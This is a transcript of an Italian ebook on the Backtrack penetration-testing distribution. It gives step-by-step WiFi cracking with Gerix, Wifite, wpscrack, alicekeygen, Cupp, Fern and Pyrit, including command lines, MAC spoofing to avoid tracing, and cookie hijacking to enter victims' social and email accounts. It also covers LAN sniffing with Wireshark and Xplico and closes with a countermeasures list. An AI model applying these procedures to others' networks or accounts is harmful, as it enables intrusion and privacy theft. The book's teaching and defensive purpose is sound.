nuovi mezzi di comunicazione.

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "nuovi mezzi di comunicazione."

Transcript

1 1

2 Questo libro, giunto alla seconda versione, parla del sistema operativo Backtrack, che si focalizza sulla sicurezza dei computer ed è disponibile sia come Live DVD che come Live USB, In questa seconda edizione, sono state aggiunte più di 30 pagine, in cui si parla di nuove tematiche, come il VOIP, il mondo mobile. Sono state aggiunte descrizioni di nuove applicazioni, che sono state aggiunte nella versione 5 R3. Tra esse spiccano WiFite e Fern. Backtrack è possibile installarlo permanentemente sull'hard disk. Sfogliando tra queste pagine, sarà possibile trovare guide con immagini dettagliate, sulle principali tematiche della sicurezza, tra cui ricerca di passwords, analisi di una rete locale e wif i e molte altre. La struttura del sistema operativo riprende Ubuntu, permettendo così di avere una aspetto grafico più intuitivo, richiedendo meno applicativi eseguibili solo dal terminale. L intento principale di questo libro, è quello di mettere il luce come spesso la sicurezza non è presente o comunque sia facile eluderla con semplici operazioni, eseguibili da chiunque abbia una minima conoscenza dell Informatica. Inoltre sfogliando queste pagine, voglio dare suggerimenti per evitare furti di identità virtuali e documenti presenti nei dischi rigidi. Sebbene la rete sembri un posto relativamente sicuro, ogni PC connesso ad essa lascia tracce, che possono essere usate da un eventuale Cracker per portare a termine un attacco ed entrare, con il vostro aiuto, nel proprio pc, senza che voi ve ne accorgiate. Questo libro è diviso in capitoli, ognuno dei quali contiene un argomento ben preciso e cerca di spiegare attraverso immagini e comandi i vari argomenti; inoltre vi sono veri e propri esempi sull utilizzo delle varie applicazione. Tra tutte spiccano WireShark, Aircrack, Xplico, AutoScan, NMAP e tante altre. Questo libro è stato scritto interamente da Giacomo Bellazzi, uno studente della Facoltà di Ingegneria Elettronica e Informatica a Pavia, appassionato fin da piccolo all informatica da quando c era Windows 95 fino a tempi più moderni con l avvento del WiFi e dei 2

3 nuovi mezzi di comunicazione. Disclaimer importante: Questo libro è stato scritto SOLO PER FINALITA CONOSCITIVE E PER TESTARE LA PROPRIA RETE. Ricorda così dice l articolo 615. Chiunque abusivamente si introduce in un sistema informatico o telematico protetto da misure di sicurezza ovvero vi si mantiene contro la volontà espressa o tacita di chi ha il diritto di escluderlo, è punito con la reclusione fino a tre anni. 3

4 Sezione 1 4

5 Dove Scaricare Backtrack Backtrack è un sistema operativo open source, cioè è libero e completamente gratuito e chiunque può installarlo sui propri pc e notebook. Infatti basta un lettore dvd o una porta usb per poter avviare ed utilizzare il sistema operativo. Per scaricarlo basta andare sul sito ufficiale compilare in modo facoltativo il piccolo form e nella successiva pagina, si seleziona il tipo di PC sul quale verrà installato l OS. Per una configurazione standard, basta seguire come nell immagine presente, cioè per un PC a 32 bit. in modo facoltativo il piccolo form e nella successiva pagina, si seleziona il tipo di PC sul quale verrà installato l OS. Per una configurazione standard, basta seguire come nell immagine 5

6 presente, cioè per un PC a 32 bit. L estensione del file scaricato è iso, cioè un formato compresso, facile da poter masterizzare su DVD o su chiavetta (almeno da 4GB). Il download non sarà dei più veloci vista la dimensione dei file. Resta tuttavia possibile scaricarlo via torrent, selezionando l opportuna casella la momento del download. 6

7 Sezione 2 7

8 Come Installare Backtrack Dopo aver scaricato il sistema operativo Backtrack in formato ISO, basta masterizzarlo su DVD per poter utilizzarlo fin da subito. La modalità con cui si utilizza questo OS da DVD prende il nome di Live DVD, in quanto non si utilizza il disco rigido in modalità scrittura, ma soltanto in fase di lettura. Una volta inserito il dischetto, si seleziona invio due volte e si vedrà che il PC sta caricando alcuni file. Una volta conclusa questa fase di caricamento, per passare alla modalità grafica più intuitiva, basta digitare il comando startx. Dopo pochi secondi ci apparirà una schermata come questa: Sul desktop, si noterà una icona con scritto Install Backtrack. Questo permette di impostare correttamente il sistema operativo sul proprio PC o su chiavetta USB. Se anche questa perifica esterna è possibile installarlo, con la possibilità di visualizzare Backtrack su 8

9 vari PC. Nelle prime schermate si imposta la regione, l ora e il tipo di tastiera. Dopo si giungerà ad una schermata per impostare la destinazione di installazione. Se si vuole avere SOLO Backtrack sul disco rigido, bisogna selezionare use entire disk. Qui ci sono due ulteriori impostazioni; se si vuole l OS sulla chiavetta USB si utilizza la periferica appropriata con la relativa impostazione del Boot Loader (spuntando l opzione Installare il boot loder in/dev/sdb). Se lo si vuole su il disco rigido del PC, bisogna selezionare l altra periferica disponibile ( è facile individuarla per via della dimensione). Se si vuole ulteriori configurazioni, basta selezionare manuale; è tuttavia possibile installarlo in parallelo con altri sistemi operativi quali Windows, senza entrare in conflitto tra di loro. Per sfruttare al meglio le potenzialità di Backtrack, è consigliabile avere a disposizione almeno 30 GB, mentre su chiavetta USB almeno 4GB. Una volta installato Backtrack, dopo il riavvio, apparirà una schermata con scritto login. Per accedere alla parte grafica, basta digitare root invio, toor invio, startx e invio. Root è l username, toor e la password, startx è il comando per avviarlo. A mio giudizio il metodo migliore è quello di installare solo Backtrack su un disco rigido, per avere più memoria disponibile; però se uno utilizza più di un PC la cosa migliore è quello di metterlo su una chiavetta USB, per avere sempre i dati disponibili. Aggiornare le applicazioni del sistema operativo 9

10 Per aggiornare le applicazioni del sistema operativo con gli ultimi pacchetti disponibili, è possibile farlo direttamente da terminale. Digitiamo i seguenti comandi: sudo apt-get update sudo apt-get upgrade Al primo comando, dovremo inserire la password, poichè ci servono di diritti di root cioè di amministratore del sistema, mentre nel secondo dovremo semplicemente digitare y, che sta ad indicare yes. Aggiornare il sistema operativo Se invece si vuole aggiornare completamente il sistema operativo, per esempio passare dalla versione R2 alla R3, occorre digitare da terminale: apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jbossautopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi10

11 cracker powersploit webhandler 11

12 Sezione 3 12

13 La prima intrusione in una rete Wifi Ormai il termine wifi è entrato nel linguaggio di quasi tutte le persone che si appassionano all informatica e non. La maggior parte delle famiglie che hanno una connessione ad internet, hanno un router Wifi in casa, per potersi connettere ad internet senza fili in tutta la casa, senza il bisogno di essere collegati ad un cavo ethernet, o ancora più all antica al cavo USB. D altronde gli ISP (Internet service provider) permettono la vendita/noleggio di questi dispositivi a prezzi contenuti, che vengono inseriti direttamente nella bolletta dei vari servizi di telefonia. Non a caso, se si dovesse fare una scansione delle reti che ci circondano, si nota quasi subito un altissimo numero di SSID (service set identifier) del tipo AliceXXXXXXXX o Fastweb-X-XXXXXX etc Queste reti, sebbene sembrano protetta da password WPA e WPA2 (Wi-Fi Protected Access), che sono più sicure delle ormai vecchie WEP, si è scoperto essere meno sicure di quanto si pensasse; infatti attraverso un algoritmo, è possibile risalire alla password di default direttamente dalle cifre che compongono il nome della rete, che è facilmente ricavabile. Questa procedura è stata facilitata, grazie allo sviluppo di applicazioni reperibili anche da dispositivi mobili, quali ios e Android. Se invece l utente ha cambiato la password che gli è stata fornita, qui le cose si complicano, perchè è necessario un attacco di bruteforce, in cui si provano tutte le possibile combinazioni di lettere e numeri o un attacco con un dizionario, che è più limitato dal punto 13

14 di vista di possibilità di riuscita dell attacco, ma è sicuramente più veloce. È invece quasi un gioco da ragazzi craccare una rete con protezione WEP, perchè il meccanismo di scambio della cifratura tra la base (che è il router) e il client (che è il pc connesso alla base) è stato bucato. Le applicazioni che verranno analizzate in questo capitolo sono molte, ognuna di esse ha una sua peculiarità e metodo d utilizzo, ma tutti sono semplici da utilizzare, anche alla prima volta. In generale si può brevemente associare ai seguente programmi le seguente caratteristiche e finalità: Gerix va bene se si vuole craccare una rete WiFi con protezione WEP, WPA o WPA2 con un dizionario o rainbow tables ma per via dei tempi, non conviene se si sfruttano delle falle particolari. Wifite è un programma automatico, nel senso che una volta impartita la scansione e terminata, in automatico proverà a craccare reti WEP e WPA anche con meccanismo WPS, cosa che Reaver ma manualmente. Fern è un programma abbastanza recente che permette attraverso una grafica di craccare le principali reti WiFi. Inoltre questo programma supporta il Cookie Hijacker, con cui è possibile entrare negli account delle vittime, senza che esse se ne accorgano. Ecco una definizione di questo tipo di attacco, tratta da wikipedia: Questa tecnica, più nota come Browser Hijacking (dirottamento del browser), permette ai dirottatori di eseguire sul malcapitato 14

15 computer una serie di modifiche tali da garantirsi la visita alle loro pagine con l'unico scopo di incrementare in modo artificioso il numero di accessi e di click diretti al loro sito e conseguentemente incrementare i guadagni dovuti alle inserzioni pubblicitarie (ad es. banner pubblicitari). Nei motori di ricerca ad esempio, l'hijacking sfruttando un bug del motore attraverso il redirect lato server, riesce a sostituirsi al sito "vittima" nei risultati del motore. In pratica in una ricerca su un motore, cliccando sul collegamento scelto, ci appare tutt'altra cosa rispetto a quello desiderato. Altri programmi sfruttano semplicemente la falla presente in alcuni router rilasciati in comodato d uso da parte degli ISP. Per esempio WiRouter KeyRec, il quale inserendo soltanto il nome della rete, restituisce la password per accedervi. Gerix: Craccare una rete wifi, come ho già scritto precedentemente non è poi così difficile. Se per alcune reti senza fili (vedi quelle dei router in comodato d uso da parte dei gestori) è quasi immediato, per altre non è uguale, ma con Backtrack il compito si semplifica. Su questo sistema operativo ci sono molti programmi che permettono di craccare un reti Wifi, ma oggi vedremo quello più veloce e più intuitivo, senza ricorrere ( o quasi) a comandi da terminali, come per il programma Aircrack. L applicativo che useremo si chiama Gerix Wifi e sfrutta per dir la verità funzionalità di Aircrack, ma con una veste grafica più semplice. Prima di passare alla parte pratica, facciamo un po di teoria per capire cosa stiamo facendo. Innanzitutto quando ci connettiamo normalmente alle reti Wifi, 15

16 utilizziamo la scheda del PC in modalità attive mode, cioè capta solo i pacchetti destinati alla periferica che utilizziamo. In questo modo i pacchetti delle reti Wifi nelle vicinanze vengono ignorati, perchè non servono. Invece per utilizzare correttamente la scheda con Gerix, bisogna utilizzarla in mode monitor o passive mode, cioè in grado di intercettare tutti i pacchetti delle rete Wifi che ci sono nelle vicinanze. Il passo successivo per non lasciare tracce in giro, è quello di cambiare il proprio mac address ( è un indirizzo composto da 12 carattere che identifica univocamente una periferica Wifi) con uno fake cioè fasullo. Dopo aver fatto ciò siamo praticamente coperti da eventuali rintracciamenti. Fatto ciò si sceglie una rete Wifi di prova per craccarlo. Il consiglio è quello di farlo su una propria rete, per evitare denunce. Di solito si sceglie quella più fragile; tra tutte spiccano quelle WEP che in 10 minuti sono craccabili. Qui si sfrutta il fatto che la password viene più volte scambiata tra le periferiche connesse alla stessa rete. Mentre per le WPA servono dizionari contenenti tutte le possibili password; questo perchè non è ancora stata trovata una vera e propria falla ( se non per alcuni tipi di protezione, per esempio TKIP)). Ora che abbiamo un po di teoria passiamo alla pratica! Per trovare questo applicativo basta andare in BacktrackExploitation Tools-Wireless Exploitation Tools-WLAN ExploitationGerix 16

17 Per impostare la modalità passive mode e per cambiare il mac address, basta andare nel tab configuration e fare le seguenti operazioni con questo ordine: 17

18 1. Set Random Mac address 2. Enable/Disable Monitor Mode 3. Set Random Mac address Ora abbiamo impostato correttamente i parametri della periferica. Per selezionare la rete Wifi da attaccare, basta selezionare Rescan networks e da li la si seleziona, ricordando che una password WEP è più semplice da craccare rispetto ad WPA. In base alla protezione della rete, si utilizzano diverse schede Se la password è una WEP, bisogna andare nella tab WEP. 18

19 Per prima cosa si seleziona Start sniffing and logging ; dopo aver fatto ciò se ci sono altri pc connessi alla rete se segue la procedura per WEP ATTACKS with clients se no no clients. Per i passaggi successivi basta selezionare passo dopo passo i comandi presenti. Per quanto riguardo le WPA, la cosa si complica, perchè dovremmo utilizzare un attacco dizionario cioè ricercare la password presente in file testo che noi abbiamo scaricato dalla rete (basta digitare su Google). 19

20 Bisogna sempre far partire l opzione Start Sniffing e poi WPA attaccks. Qui per forza ci deve essere un pc già connesso alla rete. Per avere in forma scritta la password di WEP, dopo circa 20,000 pacchetti ( ci vogliono pochi minuti per ottenerli se c è una periferica connessa), basta fare Decrypt Password 20

21 Per una WPA dopo aver inserito il link per il dizionario contenente tutte le possibili combinazioni di carattere ritenuti opportuni, basta fare CRACK WPA password. 21

22 Il test è finito e come potete vedere non è poi così difficile entrare nelle reti WIFI. WPA Tester, iwuppy, iwpa, WiRouter KeyRec 22

23 Se queste istruzioni non vi sono troppo famigliari (fidatevi che sono semplici), l operazioni di intrusione, può essere fatta semplicemente da un cellulare Android o da iphone. Per Android l applicazione principale è WPA Tester, precedentemente disponibile su Market Store, poi rimossa per motivi legale, è tuttavia possibile scaricarla digitando su un motore di ricerca WPA Tester.apk, giusto alla versione 4.0. Apk è l estensione per applicazione che girano su Android. Per installarla basta collegare il telefono al PC e copiare il contenuto. Una volta aperta, abbiamo due possibilità, o eseguire una scansione o inserire direttamente il nome della rete senza fili. Le reti craccabili, sono evidenziati dall icona verde a sinistra. Poi basta premere Prova a connettere e sarà evidenziata la password per accedere alla Rete, utilizzabile anche da un PC. 23

24 Per ios, cioè per iphone, ipod touch le applicazioni sono varie. Le migliore è disponibile soltanto per dispositivi sbloccati si chiama Wuppy ed è possibile scaricarla da Cydia all indirizzo 24

25 Il procedimento è lo stesso per WPA Tester, cambia solamente la parte grafica. Per iphone non sbloccati, esistono tante applicazioni a riguardo. La prima che mi viene in mente è iwpa, la quale, semplicemente digitando il nome della rete, restituisce la password. In tutti i casi, però, se la password è stata cambiata dall utente del router Wifi, questo procedimento non funziona, poichè sfrutta il fatto che la password generata di default risultati 25

26 calcolabile attraverso un algoritmo. Come già ribadito più volte nel corso di queste pagine, molte reti WiFi dei router in comodato d uso degli ISP Italiani e non solo, sono soggette a una grave falla di sicurezza, poiché il recupero della password è quasi immediato, attraverso il nome della stessa rete o al massimo attraverso il mac address. L unico rimedio, è quello di cambiare il nome della rete WiFi, oppure di cambiare la password di default ( cosa da fare sempre ). Dopo l avvenuta conoscenza di questa falla, sono state sviluppate 26

27 tantissimi applicazioni per verificare se il proprio router rientra tra quelli soggetti a questo problema. Le più famoso sono WPA Tester ( per Android ), iwpa ( per ios ). In questo post si parlerà di una nuova applicazioni sviluppata in C e quindi universale, che permette di calcolare le password delle rete WiFi in maniera rapida e semplice. Il programma si chiama WiRouter KeyRec ed è stato sviluppato da Salvatore Fresta. Come utilizzare WiRouter KeyRec per trovare le password delle reti WiFi dei router degli ISP Come primo passo, occorre effettuare il download dell applicazione dal sito ufficiale, direttamente da questolink. Il file è in formato zip e pertanto è necessario scompattarlo, attraverso il seguente comando: unzip WiRouter_KeyRec_

28 Per poter compilare l applicazione ed eseguirla, occorre postarci all interno della directory appena scompattata. Per farlo digitiamo: cd WiRouter_KeyRec_

29 Ora basta semplice compilare un programma in C, composto da più main e con file oggetto, digitando in sequenza:./configure 29

30 sudo make 30

31 sudo make install 31

32 Ora che abbiamo completato la fase di installazione, possiamo finalmente usarlo. Per farlo basta digitare wirouterkeyrec e troviamo un help, con la relativa sintassi per l uso corretto. 32

33 WPSCrack ( sfrutta la falla di autenticazione del WPS ) Wi-Fi Protected Setup (WPS) è uno standard per l'instaurazione di connessioni sicure su una rete Wi-Fi domestica, creato dalla Wi-Fi Alliance, e lanciato l'8 gennaio Nelle precedenti righe ho già parlato di come molte reti Wifi, specialmente quelle con protezione WEP e quelle in comodato d uso da parte dei vari gestori, siano facilmente vulnerabili. Recentemente Craig Heffner, esperto di sicurezza in informatica, ha scoperta un bug davvero importante, su unparticolare tipo di reti Wifi, quelle dotate della funzionalità WPS. Questa tecnologia, permette di associare un router e un client, premendo semplicemente un tasto su entrambi i dispositivi; in sostanza viene generato in automatico un codice pin, composto da 33

34 8 caratteri. Fin qui non ci sarebbe nessuna differenza da un attacco di tipo bruteforce, che impiegherebbe tantissimo tempo per provare tutte le possibili combinazioni. Però Craig Heffner, ha notato che questo codice è composto da 2 parti, entrambe composta da 4 cifre. La prima parte viene generata senza un algoritmo ben preciso, mentre la seconda è facilmente ricavabile dalla prima. Così l attacco si riduce a soli tentativi possibili, un gran risparmio di tempo. Quindi in poche ore, è possibile ricavare il codice pin da 8 carattere, utile per accedere alla rete Wifi, con funzionalità WPS. La prima parte, come ho detto, non è una sequenza logica ben preciso, però quando un client tenta di richiedere una connessione al Router WPS, quest ultimo rilascia un messaggio di errore EAP-NACK. Dalla teoria alla pratica L applicativo che ci viene incontro è quello realizzato da Stefan Viehbock, anch egli esperto di sicurezza in Informatica. Per scaricare l applicazione basta andare al seguente indirizzohttp://dl.dropbox.com/u/ /wpscrack.zip e scaricare il file. Una volta scompattato e messo in Desktop, si apre il terminale e si digita: cd /root/desktop./ wpscrack.py iface mon0 client <mac address 34

35 della periferica> bssid <AP MAC address> ssid <Nome della rete wifi> -v Ovviamente bisogna cancellare i caratteri <>. Per ricavare il mac address della periferica basta digitare da terminale ifconfig, mentre per il Mac address della rete Wifi da attaccare, ci sono tantissimi modi; quello più semplice è quello di utilizzare Gerix. Dopo aver eseguito il comando, l applicazione tenterà di scoprire il codice PIN. Il tempo richiesto varia a seconda della difficoltà, ma entro poche ore, sarà possibile ricavarlo. Wifite ( un tool automatico ) Nelle scorse pagine, ho già parlato di tool che permette di craccare una rete wifi con pochi e semplici programmi. Addirittura per alcuni 35

36 reti, per esempio quelle dei router in comodato d uso ( vedi Alice e Fastweb in primis ) basta inserire il nome delle rete e le password viene generata in automatico. Per le altri tipologie di rete, la procedura risulta leggermente più complesse; con il tool Wifite, però questo procedura viene fatta in automatico! Ecco come installare e come funziona Wifite. Installazione Per effettuare l installazione apriamo il terminale di Backtrack e digitiamo questo comando: wget -O wifite.py Dal momento che richiede alcuni permessi per utilizzare, per esempio, la periferica wifi in mode monitor, diamo il seguente comando: chmod +x wifite.py 36

37 37

38 Funzionamento dell applicazione Ora che l applicazione è stata installata correttamente, avviamola così: python wifite.py Ora che l applicazione è stata avviata, come prima cosa sarà effettuata una scansione delle reti wifi presenti nel nostro raggio d azione. L operazione richiede poche decine di seconde. Per interromperla, basta premere i tasti ctrl+c ; con questo comando l applicazione analizzerà i dati, in base alla tipologia di protezione. Inoltre, nella stessa schermata sarà possibile analizzare la presenza del protocollo WPS, che, come abbiamo visto nelle 38

39 scorse puntate, è risultato un punto debole per la protezione delle stessi reti. Ora siamo pronti per far partire la procedura automatica del craccaggio delle rete. Possiamo scegliere i craccare singole reti, selezionandole con i relativi numeri, oppure digitare il comando all, per indicarle tutte. Ora che è partita la procedura, basterà attendere che il programmi completi le varie operazioni. Un vero gioco da ragazzi! L unica nota da fare riguarda le reti WPA senza WPS. In questo caso, l applicazione catturerà in automatico handshake ed effettuerà un attacco di tipo dizionario. In caso la password non fosse presente in tale dizionario, la rete potrà ritenersi sicura. Nella prossima schermata verrà mostrata una visuale simile a quella originale. Nella parte centra è possibile vedere una sorta di tabella, contenente il nome della rete WiFi, il canale di trasmissione, il tipo di protezione e il supporto all autenticazione con il WPS. 39

40 40

41 Creazione di un dizionario WPA Nelle pagine precedenti, abbiamo discusso sui vari metodi per entrare in una rete Wifi, sottolineando che per le rete WPA, serve, se non in casi particolari, un dizionario. Ora vedremo come è possibile crearne uno davvero speciale. L applicazione che utilizzeremo si chiama Cupp ed è possibile trovarla in ApplicationsBacktrack-Privilege Escalation-Passwords Attacks-Offline AttacksCupp. Questa applicazione crea un file con estensione.txt, contenenti centinaia di possibili passwords, che sono collegate direttamente alla vittima, come per esempio il suo nome, cognome, data di nascita, nome del figlio etc. 41

42 Il passo successivo è quello di digitare da linea di comando./cupp.py -i Ora dovremo semplicemente compilare in modo interattivo il piccolo questionario, nel quale dovremo indicare alcuni semplici informazioni, quali nome, cognome etc.. della persona a cui dobbiamo eludere qualsiasi tipo di protezione. 42

43 Una volta completata la parte di compilazione, avremo un file con il nome della vittima, che sarà il nostro dizionario! Per aprirlo basta semplicemente digitare: cat nomefile.txt Questo dizionario WPA è davvero perfetto per le persone che utilizzano password contenti informazioni personali. Creare dizionario WPA per Alice Nella sezione precedente, abbiamo visto come entrare in una rete wireless. In particolare ho sottolineato, come sia facile reperire le password di una rete wifi di Alice, poichè essa è ricavabile direttamente dal nome della rete SSID. Oggi vedremo come applicare questa procedura direttamente dal PC, utilizzando l applicazione alicekeygen. Questa applicazione, in sostanza, crea un dizionario delle possibili passwords in un file di testo, che verrà utilizzato in un attacco a dizionario. Per scaricare questa applicazione, basta aprire il seguente link 43

44 Una volta aperta questa pagina, apriamo il alicekeygen-0.3.tar.gz e scompattiamo il file nella cartella alicekeygen-0.3 nella nostra scrivania e ci spostiamo in questa cartella direttamente da terminale. 44

45 Ora dobbiamo compilare il sorgente in c, digitando da terminale: gcc alicekeygen.c sha256.c -w o alicekeygen Ora possiamo finalmente accedere al nostro programma. Prima 45

46 però, dobbiamo recuperare in sostanza due informazioni utili per craccare una rete wifi di Alice. La prima è il nome della rete, per esempio Alice , la seconda è il BBSD, cioè il suo mac address di rete. Per trovare queste informazioni, possiamo utilizzare Gerix o anche semplicemente il tool offerto da Backtrack per connetterci alla rete. Ora che abbiamo queste informazioni, ci basta digitare da terminale questa stringa:./alicekeygen -s Alice m 00:23:8E:01:02:03 -o dict.txt Dove./alicekeygen serve per aprire il nostro programma, Alice è il nome della rete e il numero composto da 12 valori è il mac address. Ora avremo un file dict.txt, che potremo utilizzare come dizionario per un attacco alla rete wifi di Alice, utilizzando per esempio Gerix, un tool che abbiamo già visto come si utilizza. L unica condizione che ci servirà è quella che la persona che utilizza questa rete, non abbiamo modificato la password di default. Fern WiFi Cracker Sul web e nelle precedenti pagine, sono presenti tantissimi programmi che permetteno di craccare una rete WiFi; tra cui spiccano Gerix, Reaver e iwpa. Ma nessuno di essi è completo, 46

47 per esempio a Gerix manca il supporto al WPS e Reaver sfrutta soltanto un attacco con la falla di sicurezza del WPS. In queste prossime pagine verrà illustrato un nuovo programma, davvero eccezionale sia per la semplicità d uso sia per le sue funzionalità. Si chiama Fern WiFi Cracker. Questo tool è presente nella nuova versione di Backtrack, mentre è possibile installarlo per gli utenti Ubuntu, semplicemente scaricando il pacchetto in formato debian e digitare da terminale: dpkg -i Fern-Wifi-Cracker_1.2_all.deb Per gli utenti della versione 5 R3 è possibile trovare l applicazione al seguente percorso Backtrack/Explotation Tools/Wireless Explotation Tools/WLAN Explotation/fern-wifi-cracker. 47

48 Dal momento che questa applicazione viene aggiornata di frequente, conviene cliccare sul comando Update presente a sinistra. In ogni caso compare una scritta in caso di presenza di una nuova versione. Ora che l applicazione è aggiornata, occorre selezionare la periferica WiFi da utilizzare, nella zona in alto a destra, seguito da un refresh 48

49 Ora che l applicazione ha attivato la scheda WiFi in mode monitor e fatto una scansione delle reti presenti nelle vicinanze, sarà in grado di indicare i tipi di protezione di tale SSID. 49

50 Ora, in base all obiettivo, è possibile selezionare le reti WiFi protette da WEP oppure da WPA. In entrambi casi, un attacco sfruttando la falla di sicurezza del WPS è possibile. 50

51 Reti WEP Le reti WiFi sono abbastanza semplici da craccare, in quanto la password WEP, seppur cifrata, è presente direttamente nei pacchetti IVS che vengono scambiati tra l Access Point e il client. In questa applicazione, occorre semplicemente selezionare la rete e far partire l attacco, attraverso il comando Attack. Reti WPA e WPA2 51

52 Per le reti protette con cittografia WPA la questione si complica leggermente. Tuttavia con un buon dizionario oppure sfruttando il fatto che la tecnologia WPS sia attiva nel router, è possibile eludere tale rete ed ottenere in chiaro la password (ovviamente della propria rete, vero?). In pratica, dobbiamo selezionare la rete e verificare di poter 52

53 ottenere l handshake, attraverso la deautenticazione di un client.una volta fatto partire l attacco, dobbiamo inserire un dizionario. Quello presente all interno di Backtrack è possibile reperirlo all indirizzo Root/pentest/passwords/wordlists. Tuttavia, sul web e nelle prossime pagine, sarà possibile trova/realizzare dizionari con un ottima possibile di riuscita. 53

54 Sotto la voce Toolbox, è possibile trovare interessanti tool: per esempio è possibile impostare un mac address fisso quando si utilizza questa applicazione. 54

55 Forse più rilevante, è Cookie Hijacker. Questa funzione, permette di intercettare i cookie scambiati all interno della LAN oppure WLAN e accedere, ovviamente abusivamente, nell aree riservate della vittima, tra cui Facebook, GMAIL, Twittr etc. In questo, occorre semplicemente selezionare la scheda WiFi e far partire l attacco. Dopo che saranno scambiati i cookies, sarà possibile effettuare l attacco. 55

56 Per evitare di cadere in trappola è importante utilizzare sessioni SSL e di collegarsi a reti con protezione WPA2 e magari con l isolamento dei client. Contromisure per evitare intrusioni : Come utilizzare Pyrit Un attacco di tipo bruteforce, richiederebbe di per se tanto tempo a causa del molteplici tentativi che bisogna fare. Tuttavia un ottimo programma per velocizzare questi tipi di attacchi è Pyrit. Esso sfrutta la potenzialità della calcolo della scheda video, per diminuire il tempo dell operazione. Per verif icare la velocità di calcolo, basta guardare la seguente immagine. 56

57 I requisiti sono pochi, basta avere un buon PC e l handshake contenuto in file.cap, che si ottiene, per esempio, con AirCrack. 57

58 All interno del pacchetto di questa applicazione è possibile, come test, trovare questi file: dict.gz è una gzip-compressa wordlist wpa2psk-linksys.dump.gz è una gzip-compressa dump di un WPA2-PSK handshake wpapsk-linksys.dump.gz è una gzip-compresssa dump a WPA-PSK handshake Come primo passo occorre analizzare il pacchetto: pyrit -r wpapsk-linksys.dump.gz analyze e l output sarà: Ora digitiamo: pyrit -r wpapsk-linksys.dump.gz -i dict.gz -b 00:0b:86:c2:a4:85 attack_passthrough Dove 00:0b:c2:a4:85 è il mac address dell access point. 58

59 Dopo un po di tempo, si avrà questo output: All interno del help ti pyrit è possibile trovare varie opzioni, che permettono di ottenere risultati migliori, a seconda della tipologia di rete da testare. Contromisure Ecco alcune semplici precauzione, per evitare che la propria rete Wifi diventi vulnerabile: 1) Cambiare la password di default 59

60 2) La password deve almeno di 10 carattere, tra cui lettere sia maiuscole che minuscole, numeri e carattere speciali (del ^...) 3)La protezione se possibile WPA2 o WPA con cifratura TKIP 4)Disabilitare il rilascio in automatico degli ip (detto DHCP) 5)Utilizzare un filtraggio attraverso i Mac Address (che sono in sostanza "il documento di riconoscimento" delle periferiche) 6)Controllare periodicamente le periferiche connesse alla rete 7)Nascondere la prova la rete Wifi, facendola diventare hidden ssid, cioè non visibile immediatamente Tutte queste procedure, possono essere effettuate dalla pagina di controllo del router. Per individuarla, basta verificare lo stato della propria periferica o da terminale digitando prima iwconfig, ifconfig. 60

61 61

62 In questo capitolo vedremo come analizzare il traffico in una rete locale, per poter visualizzare in chiaro cosa succede, tra cui siti visualizzare e tanto altro. Primo di tutto facciamo un po di teoria su come funziona una rete locale. Un PC per poter accedere ad internet, ha bisogno di un router, che fa da NAT, cioè smista il traffico che proviene dall esterno per re-indirizzarlo alla periferica che ne ha fatto la richiesta; quindi tutto il traffico generato in una rete passa per forza dal router, che invia poi le richieste fuori, con un IP pubblico, mentre il pc ha un IP privato (es xxx.xxx). Quindi tutti i pc connessi al router, riescono ad intercettare i pacchetti inviati da altre periferiche. Ora passiamo alla pratica. Uno dei programmi per analizzare la propria rete si chiama Wireshark. Per farlo partire in modo corretto è meglio da terminale, per potergli dare i diritti di amministratore. Per farlo basta digitale da terminale: Sudo Wireshark Una volta digitato questo comando, apparirà una schermata simile a questa: 62

63 Per far partire la vera e propria analisi, basta cliccare la prima icona a sinistra e premere Start sulla periferica any in modo tale da non sbagliarci. Ora che Wireshark sta svolgendo il suo lavoro, attendiamo qualche minuto, mentre tutto il traffico viene generato nel LAN (Local Area Network) Ora abbiamo un file con estensione.cap, ricco di informazioni, che è pronto da essere analizzato. Per fare ciò ci viene incontro un applicazione GUI cioè grafica molto intuitiva e semplice da usare. Si chiama Xplico. Per avviarla, basta andare in BacktrackInformation Gathering-Network Analysis-Network Traffic Analysis Xplico Web Gui 63

64 Un volta qui si fa partire la pagina web dedicata all indirizzo e si fa partire la sessione di analisi. Il nome utente e la password per il login è xplico. Dopo aver inserito le credenziali di default, selezioniamo new case, scriviamo un nome per identificarlo, selezioniamo il case e facciamo partire una New Sessione e nella pagina successiva facciamo un upload del file.cap creato precedentemente. 64

65 Dopo pochi istanti (dipende dalla dimensione del file.cap) si avranno moltissime informazioni sul traffico generato nella rete locale, tra cui i siti visualizzati, le immagini, gli indirizzi , le chat dei vari servizi di messaggistica, praticamente tutto. Questo processo, il quale prende il nome di sniffer, poichè si ascolta il traffico nel LAN, è utile per capire se c è un intruso che è entrato nella nostra rete e per capire cosa sta facendo. Tuttavia questo tecnica è usata principalmente per raccogliere informazioni di altre persone, per invadere la privacy e questo è un reato punibile dalla legge. Se vogliamo studiare ancora in dettaglio la rete Locale, possiamo utilizzare l applicazione AutoScan 65

66 Come si può notare da questa immagine, l applicazione è interamente grafica, quindi intuitiva e semplice da utilizzare. Una volta selezionata la periferica da utilizzare (quella con cui siete connessi alla rete che vi interessa), AutoScan farà una scansione della LAN e dopo poco tempo sarà possibile visionare tutte le periferiche connesse. Le informazioni a riguardo sono tante; in primis il tipo di dispositivo,nome della marca l indirizzo ip (è un codice composto da 4 serie di numeri che vanno da 0 a 255) che identifica come raggiungerlo e le porte aperte. Quest ultime sono alla base per poter sfruttare alcune falle del sistema operativo. Infatti queste porte, servono per utilizzare i vari servizi. Ecco una tabella, tratta da Wikipedia, che identifica il tipo di porta. Le più importanti sono la 20,21,22,23,80 e 139. Poi vedremo anche 66

67 qualcosa riguardo alla 443 (vedi Ettercap nei prossimi capitoli) 67

68 Un altro programma per ottenere informazioni sulle periferiche connesse alla rete (si chiamano host), si chiama Nmap. L applicazione si usa interamente da terminale e serve 68

